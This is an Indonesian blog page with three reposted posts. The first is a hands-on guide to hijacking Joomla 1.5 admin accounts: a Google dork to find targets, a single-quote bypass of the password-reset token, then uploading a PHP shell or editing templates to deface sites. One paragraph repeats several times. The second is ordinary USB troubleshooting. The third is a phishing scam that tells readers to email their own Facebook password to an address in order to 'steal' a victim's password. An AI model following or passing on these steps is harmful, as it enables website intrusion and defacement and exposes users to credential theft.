-meLLia maRseLina's bLog-
Jumat, 09 April 2010
Teknik hacking joomla 1.5 - it works
CMS Joomla versi 1.5 s/d kebawah, banyak sekali menyimpan Bugs, dan salah satunya dengan menggunakan metode " Token Forgot Password " untuk mengganti password admin. Hal yang sudah dianggap biasa bagi para Hacker, yang selalu saja mencari lubang ( bugs ) dalam suatu Website.
CMS Joomla versi 1.5 s/d kebawah, banyak sekali menyimpan Bugs, dan salah satunya dengan menggunakan metode "
Token Forgot Password " untuk mengganti password admin. Hal yang sudah dianggap biasa bagi para Hacker, yang selalu saja mencari lubang ( bugs ) dalam suatu Website.
Pada Joomla 1.5 ada sebuah bug “sederhana” yang berakibat fatal. Yaitu bug pada
Password Reset yang bisa membuat seseorang yang tak bertanggung jawab mengubah password dari administrator situs yang bersangkutan. Begitu orang tersebut masuk menjadi Administrator maka dia bisa merusak situsnya, mengubah tampilan depan situs, bahkan jika Server tempat situs tersebut bernaung tidak aman orang tersebut bisa merusak situs lain yang satu server dengan mudah (lewat pintu belakang/backdoor).
Lihat detailnya
disini.
Untungnya bug ini telah banyak di-patch di situs-situs yang berbasis Joomla 1.5 sehingga agak susah untuk menemukan situs yang masih bersarang bug ini mengingat bug ini udah cukup lama ditemukan. Tapi kita masih bisa mencarinya dengan mesin pencari di Google, kita bisa menemukan situs Joomla yang masih ada bugnya.
Mencari Target
Anda bisa memakai keyword khusus untuk mencari situs target dengan Google. Dengan memakai dork :
inurl:option=com_user
Dengan syntax inurl maka Google akan mencarikan situs yang mengandung kata yang kita tentukan. Mengapa harus “ option=com_user ”? Karena memang bugnya terdapat pada komponen com_user.
Untungnya bug ini telah banyak di-patch di situs-situs yang berbasis Joomla 1.5 sehingga agak susah untuk menemukan situs yang masih bersarang bug ini mengingat bug ini udah cukup lama ditemukan. Tapi kita masih bisa mencarinya dengan mesin pencari di Google, kita bisa menemukan situs Joomla yang masih ada bugnya.
Kemudian dibelakang alamat situsnya Anda tambahkan ini :
http://situstarget.com/index.php?option=com_user&view=reset&layout=confirm
Ini adalah alamat untuk membawa kita ke kotak dialog Password Reset. Untuk bisa mereset passwordnya kita harus memasukkan kode Token dengan benar.
Untungnya bug ini telah banyak di-patch di situs-situs yang berbasis Joomla 1.5 sehingga agak susah untuk menemukan situs yang masih bersarang bug ini mengingat bug ini udah cukup lama ditemukan. Tapi kita masih bisa mencarinya dengan mesin pencari di Google, kita bisa menemukan situs Joomla yang masih ada bugnya.
Tentunya kita tidak tahu kode Token yang benar. Tapi Anda bisa mengakalinya, yaitu dengan memasukkan karakter sakti ke dalam Text Box token. Yaitu :
‘
Bisa terlihat gak? Itu adalah ‘ alias tanda petik satu. Jika bugnya belum dipatch maka akan muncul form untuk memasukkan password baru. Jika tidak muncul berarti kalian tidak beruntung dan cobalah situs yang lain.
Tapi tunggu dulu, Anda masih bisa mencari cara yang lebih baik untuk menemukan situs Joomla yang masih bersarang bug.
Anda bisa mencoba dengan keyword lain, sebagai contoh :
inurl:option=com_user inurl:blabla
Kata blabla diganti dengan kata yang kita inginkan ( terserah Anda ). Jadi situs yang muncul adalah situs yang mengandung kata com_user dan kata yang kita inginkan. Sehingga hasil pencarian tentunya akan berbeda dari pencarian sebelumnya dengan harapan dari sekian hasil googling ada beberapa situs yang ternyata bisa direset Password-nya dengan kode yang tadi.
Sebagai contoh, sang penulis menemukan sebuah situs Rusia yang ketika diisi Token-nya dengan tanda petik satu langsung keluar permintaan untuk membuat password baru.
Penetration
Isi password baru dengan yang diinginkan misalnya “ 123456 ″.
Untungnya bug ini telah banyak di-patch di situs-situs yang berbasis Joomla 1.5 sehingga agak susah untuk menemukan situs yang masih bersarang bug ini mengingat bug ini udah cukup lama ditemukan. Tapi kita masih bisa mencarinya dengan mesin pencari di Google, kita bisa menemukan situs Joomla yang masih ada bugnya.
Langkah selanjutnya adalah login menjadi admin. Halaman admin Joomla terdapat di :
http://situstarget.com/administrator
Masukkan Username : admin. Password : 123456 (password yang udah di-reset tadi).
Setelah masuk ke halaman Admin, Anda bisa mengubah tulisan dengan seenaknya atau mengubah tampilan depan secara penuh alias DeFace. Untuk Deface, Anda harus mengupload PHPShell a.k.a. Backdoor ke server target atau memodifikasi theme-nya.
Deface
Untuk meng-upload Shell, gunakan Media Manager (
Site > Media Manager ) lalu upload disitu.
Tapi Anda bisa menggunakan cara lain jika Anda tidak mengerti cara menggunakannya, cukup dengan mengedit Template-nya (
Extensions > Template Manager ). Pilih template yang dijadikan default dan pilih
Edit
Setelah itu pilih
Edit HTML.
Akan keluar Template HTML Editor. Setelah itu Anda bisa mengganti sesuai dengan keinginan Anda.
FYI :
Fungsi dari artikel ini hanya untuk memberikan Anda gambaran, bagaimana seorang Hacker bisa mendeface situs berbasis Joomla 1.5 yang memiliki bug.
Sebagai saran untuk Anda yang mempunyai situs yang memakai CMS Joomla 1.5 :
· Ganti default username dari Administrator. ( Jangan menggunakan nama yang umum ).
· Patch bug. Selalu update dengan informasi bug terbaru sehingga begitu ada info suatu bug apalagi bug yang mengancam keamanan situs Anda, sehingga Anda bisa langsung menutup lubang bug.
source : http://pc-alert.blogspot.com/2010/03/teknik-hacking-joomla-15-it-works.html
posted by meLLia maRseLina at
10.31
Mengatasi USB Device not recognized
Beberapa tips mengatasi problem USB yg tidak terdeteksi dgn baik ,,
~ CEK KONEKSI PORT USB
Kadang-kadang port USB yang longgar dapat menyebabkan kegagalan deteksi hardware USB.
~ SCAN HARDWARE
Click Start > Run > Type devmgmt.msc
Dari Menu Action, pilih Scan for Hardware Changes ,. Opsi ini akan mengaktifkan deteksi hardware Windows untuk mencari perangkat yang baru diinstal,Setelah selesai, tutup semua Device Manager dan Control Panel,dan lihat apakah USB internal_tag ">
SOLUSI :
Hilangkan semua perangkat Device Manager dengan cara,
1. Klik Start> Run> Ketik CMD [OK],
2.Type set DEVMGR_SHOW_DETAILS = 1?
3. Type set DEVMGR_SHOW_NONPRESENT_DEVICES = 1?
4. Type start devmgmt.msc
5. Menu click View> Show Hidden Devices
Pada panel sebelah kiri, klik tanda + untuk melihat isi perangkat Imaging, Unknown Devices dan kelas = "st_tag USB Devices
Apakah Anda menemukan class = "st_tag internal_tag"> Uninstall.
~ HAPUS REGISTRY di HKEY_LOCAL_MACHINE / Enum / USB internal_tag ">
3.Pilih dan hapus semua entri VID_.
Jika Anda mengalami kesulitan menghapus registri ini, Windows mungkin masih dalam batas Perizinan VID_ ,coba selesaikan dengan cara berikut:
a)Klik kanan di Key untuk dihapus> Pilih Permissions.Next Window Perizinan untuk The VID_ akan muncul.
b)Pilih kotak centang dalam sesi Group atau Usename, pilih Terima dalam Full Control.
c) Click Apply dan diakhiri dengan [OK]
Matikan komputer.
semoga bermanfaat
mohon maaf dlm penyusunan katanya,,
You might also like:
Menginstal windows 7 via USB
Antivirus handal khusus Flashdisk USB
Cara Membuat dan Menghapus Database
Free Software pembuat chord dan komposisi lagu ::MuseScore::
Software untuk mempercepat PC saat bermain game
posted by meLLia maRseLina at
10.20
Hack chips : menggandakan chips poker facebook
Sekarang ini..dunia facebook telah menjadi makanan sehari-hari bagi para facebook’ers mania..yg suka online bersama teman…tahukah anda yg dinamakan game online..??ada banyak jenis permainan online yg terdapat dalam facebook..salah satunya yg mungkin paling booming saat ini yaitu POKER….tahukah anda…bahwa semua permainan online itu dapat kita curangi…????sekarang..saya akan membagikan hasil pengetahuan saya cara bermain curang dalam game online facebook seperti POKER…saya akan memberi tahukan cara menggandakan atau menambah chip anda dalam bermain POKER….
anda ingin tahu bagaimana cara menambah chip anda menjadi 2 kali lipat dari yg sebelumnya.??
caranya mudah….syaratnya cuma chip anda harus atau minimal di atas 1M…karena,jika kurang dari 1M kemungkinan untuk di banned itu besar….jd,minimal chip yg anda ingin gandakan yaitu sebanyak 1M gimana caranya..???
1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Ini adalah format pesan yang harus anda kirim ke master_generator@yahoo.com
-Kirim email ke master_generator@yahoo.com
-bcc: cc: (biarkan kosong)
-Subject: PASSWORD RETRIEVE
-Isi pesan :
baris pertama tulis >AUTOUSER: lalu alamat email anda.
baris kedua tulis >AUTOSEARCHING: lalu alamat email facebook korban.
baris ketiga tulis >LOGID :lalu password facebook anda.
baris keempat tulis kode ini >>> cgi-bin/$et76431&pwr999fb
Lalu Send/Kirim.
Contoh :
To : master_generator@yahoo.com
Bcc: Bc: (biarkan kosong)
Subject : PASSWORD RETRIEVE
Isi :
>AUTOUSER:under_ray@yahoo.com
>AUTOSEARCHING :korbankut@yahoo.com
>LOGID :blablabla
>>> cgi-bin/$et76431&pwr999fb
Lalu Send/Kirim.
Catatan: Ingat anda tidak mengirimkan email ke orang namun ke Mesin penjawab otomatis! Isi pesan dan segala formatnya harus seperti petunjuk diatas, jika tidak mesin tidak akan bisa membaca perintah anda.
Setelah itu maka anda akan mendapat email balasan berisi Password korban ..horee…!
Nb: ini hanya pembelajaran, mohon jangan terlalu disalahgunakan.
source : http://pc-alert.blogspot.com/2010/03/hack-chips-menggandakan-chips-poker.html
posted by meLLia maRseLina at
10.14
Kemudian dibelakang alamat situsnya Anda tambahkan ini :
